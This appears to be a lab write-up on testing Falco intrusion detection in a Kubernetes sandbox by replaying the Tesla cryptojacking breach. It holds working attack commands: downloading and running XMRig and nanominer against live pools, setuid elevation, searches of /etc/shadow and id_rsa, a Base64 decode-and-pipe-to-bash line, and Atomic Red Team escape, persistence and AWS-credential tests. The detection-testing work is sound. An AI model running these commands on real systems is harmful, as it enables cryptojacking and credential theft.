![Screenshot 2023-10-22 at 13 54 45](https://private-user-images.githubusercontent.com/126002808/277165986-53c5f3b3-d4c7-4570-b17e-3b1737fc9441.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTY1OTg2LTUzYzVmM2IzLWQ0YzctNDU3MC1iMTdlLTNiMTczN2ZjOTQ0MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mODUwZDVmM2JiZjlmNDY1ZGRkZjljMjgxNWFhNzA1NzBiZWNmMThjNDJlNWUxZTE1NDI2OGNmZjRhZTE0MWVjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EFaW9SFdwS1xUisPDo7YIHMmTe1IM2lfFwEVi69D7Qc)
If you look at the above screenshot: we created a new workload called tesla-app, I've shelled into the workload, and the real-time live tail of security events is showing in the second terminal window - proving the IDS works.
To enable Kubernetes audit logs, you need to add the --audit-policy-file and --audit-webhook-config-file arguments to the kube-apiserver process and provide files that implement an audit policy and webhook configuration.
Below is a step-by-step guide that shows how to configure Kubernetes audit logs on minikube and deploy Falco. Managed Kubernetes providers, like AWS EKS, usually provide their own mechanism for configuring the audit system:
https://falco.org/docs/install-operate/third-party/learning/
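A minimal sketch of an audit policy file that could be passed to --audit-policy-file; the single Metadata-level rule and the file paths are illustrative assumptions, not a recommended production policy.

```shell
# Write a minimal audit policy (illustrative; logs metadata for every request)
cat <<'EOF' > /tmp/audit-policy.yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  - level: Metadata
EOF
# The kube-apiserver would then be started with flags like (paths assumed):
#   --audit-policy-file=/tmp/audit-policy.yaml
#   --audit-webhook-config-file=/etc/kubernetes/audit-webhook.yaml
grep -q 'kind: Policy' /tmp/audit-policy.yaml && echo "policy written"
```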
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml
The adversaries would have terminal shelled into the above workload in order to install the cryptominer.
kubectl exec -it tesla-app -- bash
Download the xmrig mining package from the official GitHub project:
curl -OL https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-static-x64.tar.gz
Extracting the mining binary package (a gzipped tarball):
tar -xvf xmrig-6.16.4-linux-static-x64.tar.gz
Changing directory to the newly-downloaded miner folder
cd xmrig-6.16.4
Elevating permissions by setting the setuid bit, then listing setuid/setgid binaries:
chmod u+s xmrig
find / -perm /6000 -type f
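The setuid elevation above can be reproduced safely against a throwaway file instead of the real miner binary; this sketch shows what the chmod and find commands actually do.

```shell
# Create a scratch file standing in for the xmrig binary (assumption: GNU find)
tmpbin=$(mktemp)
chmod u+s "$tmpbin"              # set the setuid bit, as done with xmrig above
[ -u "$tmpbin" ] && echo "setuid bit set"
# -perm /6000 matches files with either the setuid or setgid bit set
find "$(dirname "$tmpbin")" -maxdepth 1 -perm /6000 -type f -name "$(basename "$tmpbin")"
```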
Tested - and works!
./xmrig --donate-level 8 -o xmr-us-east1.nanopool.org:14433 -u 422skia35WvF9mVq9Z9oCMRtoEunYQ5kHPvRqpH1rGCv1BzD5dUY4cD8wiCMp4KQEYLAN1BuawbUEJE99SNrTv9N9gf2TWC --tls --coin monero
![Screenshot 2023-10-27 at 12 05 51](https://private-user-images.githubusercontent.com/126002808/278623813-b7d9123b-f589-4bd3-9e55-1274236c3c9e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjIzODEzLWI3ZDkxMjNiLWY1ODktNGJkMy05ZTU1LTEyNzQyMzZjM2M5ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kYTY5NjE3NjA2ZjhmNTlkNGIyNmM0YTdlMGEyOTNkNTUwYWZlYTZhZjQ2NWI2MzkyMzY4YTY1MzRkNTA4YWUxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.VyUEbFU5tYMkwo2zDK1Ka2sn9JzYIujgw0jDNdAQbTo)
On the right side pane, we can see that all rules are automatically labelled with relevant MITRE ATT&CK context:
![Screenshot 2023-10-27 at 12 06 03](https://private-user-images.githubusercontent.com/126002808/278624008-392e58ea-357a-44ad-a37c-8b7bb783baec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjI0MDA4LTM5MmU1OGVhLTM1N2EtNDRhZC1hMzdjLThiN2JiNzgzYmFlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00ZWNkNWIyOWRiOGUxZGZhYWQ5NzRmNjFiMWYyYTRjNzY0OWI5MzM5MDZmYzhiYWNhN2U5YzkwZGQxYzJiZDkzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.P4uBOaYXprsiJGIuJuylSCVHFRmBXHe_R0dtlsRVrDA)
After enabling the mining ports and pools rule within my mitre_rules.yaml file, I can see the new domain detection for mining pool:
![Screenshot 2023-11-17 at 11 50 08](https://private-user-images.githubusercontent.com/126002808/283791054-996f70f8-9dcd-46e8-ae76-7b45df443151.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgzNzkxMDU0LTk5NmY3MGY4LTlkY2QtNDZlOC1hZTc2LTdiNDVkZjQ0MzE1MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hYzM4ZDgzZjNiMzVhNzg0NzY4YTY4YWNmOWE5ZjNlYWRhNDQ0N2QzZDZiZmU2ZGE2NDQyMjAzMzEzNjVlMDI5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.z-xItHSY85muZJFVBL4mFtbtizaYC_A74mvjAAWXVgQ)
Testing my own MetaMask wallet using the stratum
protocol outlined by the Trend Micro researchers:
./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -t 2
![Screenshot 2023-10-31 at 19 53 07](https://private-user-images.githubusercontent.com/126002808/279499358-dad4022c-aa60-45f1-801b-ce1a6adcd47a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NDk5MzU4LWRhZDQwMjJjLWFhNjAtNDVmMS04MDFiLWNlMWE2YWRjZDQ3YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02ZTIyZDFmN2FiMDY3ZjI4MGZmYmI5NmVhNDgzYWU0ODQ2MDcxZDljNDE0MDI4NDNjYjg2OTAwOTcwOTBiNTk1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.bVRGzxBNyHVqbUd9M3roY0qXdBGlTpxO-pV1PZMDEaY)
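The Stratum detection keys on a command line containing a URI beginning with stratum+tcp; this sketch shows how such a URI decomposes into scheme, host, and port (values taken from the command above).

```shell
# Decompose a stratum mining URI using shell parameter expansion
uri="stratum+tcp://xmr.pool.minergate.com:45700"

scheme=${uri%%://*}      # everything before ://
hostport=${uri#*://}     # everything after ://
host=${hostport%%:*}
port=${hostport##*:}

if [ "$scheme" = "stratum+tcp" ]; then
  echo "stratum mining URI detected: host=$host port=$port"
fi
```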
Some rules are specifically disabled within the sandbox manifest file, so we need to enable these separately
![Screenshot 2023-10-31 at 20 03 19](https://private-user-images.githubusercontent.com/126002808/279502315-feb29583-82e2-443d-be5d-fa9000b6290b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NTAyMzE1LWZlYjI5NTgzLTgyZTItNDQzZC1iZTVkLWZhOTAwMGI2MjkwYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lMDFhZWFiMDgwZmEwZmE0NGQ5YjUyODg1YTBiM2JiOWU1NjJmMDdkZDU3OWM2ODY2NzliMjkwMzE4YmM4ODg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.GqCVWLuoiE2piAHVPTRn3yeXDIIzssWL8gDOqNhhICk)
Maturity rules are coming through, but I need to make some changes either to the ConfigMap or within the custom rules config file:
![Screenshot 2023-11-01 at 11 28 04](https://private-user-images.githubusercontent.com/126002808/279661021-c360aba5-d580-4c2f-893a-fe9c11fde6d0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NjYxMDIxLWMzNjBhYmE1LWQ1ODAtNGMyZi04OTNhLWZlOWMxMWZkZTZkMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNjcxYmMzNmRlYTBiZjc0OGU3NzExNjI3YmMzNDYwZmJhMmQ2MzQzZDY5YjY2NDhiNzEwODhhZmZkNDc0YjM0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.mKFPsYIZDqKXaPmRCz_WgFEjChpakWbYij3Bj5tY5ic)
Check whether the xmrig process is still running:
top
If it is, find the Process ID of the xmrig process:
pidof xmrig
You can now kill the process either by Process Name or by Process ID:
killall -9 xmrig
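The kill-by-name versus kill-by-PID options can be demonstrated against a harmless stand-in process rather than the miner itself:

```shell
# Launch a harmless stand-in process and kill it by PID
sleep 300 &
pid=$!
kill -9 "$pid"                  # by-name equivalent: killall -9 xmrig
wait "$pid" 2>/dev/null         # reap the killed child
kill -0 "$pid" 2>/dev/null || echo "process $pid is gone"
```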
Next, I repeat the exercise with the nanominer binary from the official Nanopool GitHub releases:
wget https://github.com/nanopool/nanominer/releases/download/v1.4.0/nanominer-linux-1.4.0.tar.gz
tar -xvzf ./nanominer-linux-1.4.0.tar.gz
cd nanominer-linux-1.4.0/
nano config.ini
./nanominer -d
Finding credentials while we are in the container:
cat /etc/shadow > /dev/null
find /root -name "id_rsa"
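The credential hunt above can be rehearsed safely against a scratch directory; the file layout here is an assumption standing in for a real container filesystem.

```shell
# Build a fake filesystem tree containing a planted SSH key
root=$(mktemp -d)
mkdir -p "$root/root/.ssh"
touch "$root/root/.ssh/id_rsa"
# Same search as above, scoped to the scratch tree instead of /
find "$root" -name "id_rsa"
```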
This is where an attacker would use a Base64-encoded script to evade traditional file-based detection systems.
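A minimal sketch of that evasion idea: the payload only exists on disk in encoded form, so naive string matching on the script file misses it (the payload string is illustrative).

```shell
# Encode a command, then decode and verify the round trip (GNU coreutils base64)
payload='cat /etc/shadow > /dev/null'
encoded=$(printf '%s' "$payload" | base64)
decoded=$(printf '%s' "$encoded" | base64 -d)
echo "$encoded"
[ "$decoded" = "$payload" ] && echo "decoded payload matches"
```

An attacker would typically pipe the decoded output straight into a shell, e.g. `echo "$encoded" | base64 -d | bash`.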
Shell into the newly-deployed atomic-red workload:
kubectl exec -it -n atomic-red deploy/atomicred -- bash
Confirm the atomic red scenario was detected (in a second terminal window):
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Bulk data has been removed from disk'
Adversaries may delete files left behind by the actions of their intrusion activity.
Start a PowerShell session with pwsh:
pwsh
Atomic Red Team tests are all performed via PowerShell, so it might look a bit odd that I shell into a Linux container in order to perform PowerShell actions.
![Screenshot 2023-10-29 at 11 55 01](https://private-user-images.githubusercontent.com/126002808/278868893-219f7436-7f84-4e1d-ad98-0a5ad5d5ff18.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4ODY4ODkzLTIxOWY3NDM2LTdmODQtNGUxZC1hZDk4LTBhNWFkNWQ1ZmYxOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hYjJjZmIwYTAxMzhlNTY4YmNkZjg4NTMxNzlhMjIzODg2YTA3NzBiNjBmMGMyN2E3NjY1YWMxNDFhNWVlNzI0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oIiaMAj7QsDghe8Z4ztQUFFAGACO6TibvZbt9L96IyY)
Load the Atomic Red Team module:
Import-Module "~/AtomicRedTeam/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1" -Force
Check the details of the TTPs:
Invoke-AtomicTest T1070.004 -ShowDetails
Check the prerequisites to ensure the test conditions are right:
Invoke-AtomicTest T1070.004 -GetPreReqs
We will now execute the test. This test will attempt to delete individual files and individual directories, which triggers the Bulk data has been removed from disk rule (at Warning priority) by default.
Invoke-AtomicTest T1070.004
I successfully detected file deletion in the Kubernetes environment:
![Screenshot 2023-10-29 at 11 58 42](https://private-user-images.githubusercontent.com/126002808/278869026-076c4a75-f6a8-4b01-81e4-3adf06532f84.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4ODY5MDI2LTA3NmM0YTc1LWY2YTgtNGIwMS04MWU0LTNhZGYwNjUzMmY4NC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iZGRhMWZmY2I3MDE5ZDIxMGYwMzcyOWQ4Yzc1NmQ2NjIyZThkNzI0ZWNmNTk4ODVhZGJmY2Y5ZDk1ZTAzN2QxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.t79bLEj-fMRvV61BqQ80CHgxIz0KIbQt35--UuYAY2Y)
Adversaries may break out of a container to gain access to the underlying host.
This can allow an adversary access to other containerised resources from the host-level.
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Network tool launched in container'
Invoke-AtomicTest T1611
Adversaries can establish persistence by modifying RC scripts which are executed during system startup
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep Potentially malicious Python script
Invoke-AtomicTest T1037.004
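Under the hood, T1037.004 persistence is just appending a payload line to an RC script that runs at boot. A harmless sketch using a scratch file in place of /etc/rc.local (both the path and the payload below are illustrative, not the atomic test's actual contents):

```shell
# Stand-in for /etc/rc.local so this sketch is safe to run anywhere.
RC=/tmp/rc.local-demo
printf '#!/bin/sh\n' > "$RC"
# Append an illustrative payload that would execute at every boot.
echo 'python3 /tmp/payload.py &' >> "$RC"
chmod +x "$RC"
cat "$RC"
```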
The new detection rule worked. Hurrah!
When you’re ready to move on to the next test or wrap things up, run -CleanUp so leftover artefacts don’t interfere with other tests:
Invoke-AtomicTest T1037.004 -CleanUp
Shell into the same container we used earlier:
kubectl exec -it tesla-app -- bash
Install a suspicious networking tool such as telnet:
yum install telnet telnet-server -y
If this fails, point yum at the CentOS vault repositories by modifying the repo configuration:
cd /etc/yum.repos.d/
sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*
Update the yum repository metadata:
yum update -y
Now retry installing telnet and telnet-server from the updated repositories:
yum install telnet telnet-server -y
Just to generate the detection, run telnet:
telnet
![Screenshot 2023-11-14 at 21 16 33](https://private-user-images.githubusercontent.com/126002808/282940914-a008ab2c-224b-4b00-9500-62f4e460bcb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyOTQwOTE0LWEwMDhhYjJjLTIyNGItNGIwMC05NTAwLTYyZjRlNDYwYmNiNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jYjA3MDkxZWZkY2QyOWU3NTBjMmFiMmUzM2M0ZThmZDVlNTYyNWEwYmI5OWZlYmU5OWY4MjZiYTIzNDUwOGVmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.3SbpuhYG9WUBe_mtoGODJc6M_3OpdelPaJPX5SEDK-4)
![Screenshot 2023-11-14 at 21 16 56](https://private-user-images.githubusercontent.com/126002808/282940934-739a9d27-a76d-47cd-b7bc-4a20a6845adc.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyOTQwOTM0LTczOWE5ZDI3LWE3NmQtNDdjZC1iN2JjLTRhMjBhNjg0NWFkYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZTBjNTU5OTJjMDFlODBhY2M0MTYzOWU2NDMxNjI1YjA3YjlkMjFhM2MzM2RiMmU5M2NlOGQ2ZTkzZWFjYzA5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.-wXU509YNJRubg-s5RyiGvVeXDbvLBARiW642nES29M)
![Screenshot 2023-11-14 at 21 15 59](https://private-user-images.githubusercontent.com/126002808/282940964-af3e220c-aad9-43d6-ab7b-47ed391a2706.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyOTQwOTY0LWFmM2UyMjBjLWFhZDktNDNkNi1hYjdiLTQ3ZWQzOTFhMjcwNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yOGExOGVkMzhjNjEwNzJiODE0YTY0MTZkNGVmM2QyOTRhMGVjOGE3NDFhOGFkMWU4NjIxZDlhOTgwNWQwZTAyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.3MbxTxQpkKuRGSc9WMvsgiUYgrBzlb4oP5jk3GvL_Pg)
Let's also test tcpdump to prove the Falco network-tool macro is working:
yum install tcpdump -y
tcpdump -D
tcpdump --version
tcpdump -nnSX port 443
Copy files from the pod to the local system. kubectl cp lets us pull a file out of a running pod; here we copy the XMRig miner tarball from the tesla-app pod to the local desktop:
kubectl cp tesla-app:xmrig-6.16.4-linux-static-x64.tar.gz ~/desktop/xmrig-6.16.4-linux-static-x64.tar.gz
![Screenshot 2023-11-01 at 11 33 23](https://private-user-images.githubusercontent.com/126002808/279661850-44642a1d-a970-496b-ab17-6afa28ce540d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc5NjYxODUwLTQ0NjQyYTFkLWE5NzAtNDk2Yi1hYjE3LTZhZmEyOGNlNTQwZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDc3OGFjOTg3N2FiZTc4NjQ3MGUwMTM2MDE2MWVlNmJkNjFlMDNkZTkxOTI4NDllZGQ4Y2JlMDcxMzkzYmU4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.5dGlfmMm2Z4tP3APMIBcU1_t6tw0RBuMiMVXn1ziDYA)
We can use Atomic Red Team to find AWS credentials in order to move laterally into the cloud:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md#atomic-test-1---find-aws-credentials
Invoke-AtomicTest T1552.001 -ShowDetails
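The linked atomic test essentially walks the filesystem looking for AWS credential files. A reduced sketch against a demo directory (the real test searches system-wide; the key below is a fake):

```shell
# Plant a fake credentials file in a demo home directory.
mkdir -p /tmp/demo-home/.aws
printf '[default]\naws_access_key_id = AKIAFAKEKEYFORDEMO\n' > /tmp/demo-home/.aws/credentials
# T1552.001-style discovery: locate credential files under a path.
find /tmp/demo-home -path '*/.aws/credentials'
```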
![Screenshot 2023-11-13 at 21 27 36](https://private-user-images.githubusercontent.com/126002808/282599221-3f444b76-3914-4133-b1aa-9da50f556061.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgyNTk5MjIxLTNmNDQ0Yjc2LTM5MTQtNDEzMy1iMWFhLTlkYTUwZjU1NjA2MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iYTFkYmU3NWRhODliZTdjZGE1NmRjZjBlMDFiOWQ3YTU0ZWY1YmYwYWY2YWU2NGQ5YWViNTdiNzEwM2I1YWYxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.mwFN4l_oFbvhnL28SVSKE6FKM4baEMjbNP4iZJ5z6KE)
helm uninstall falco -n falco
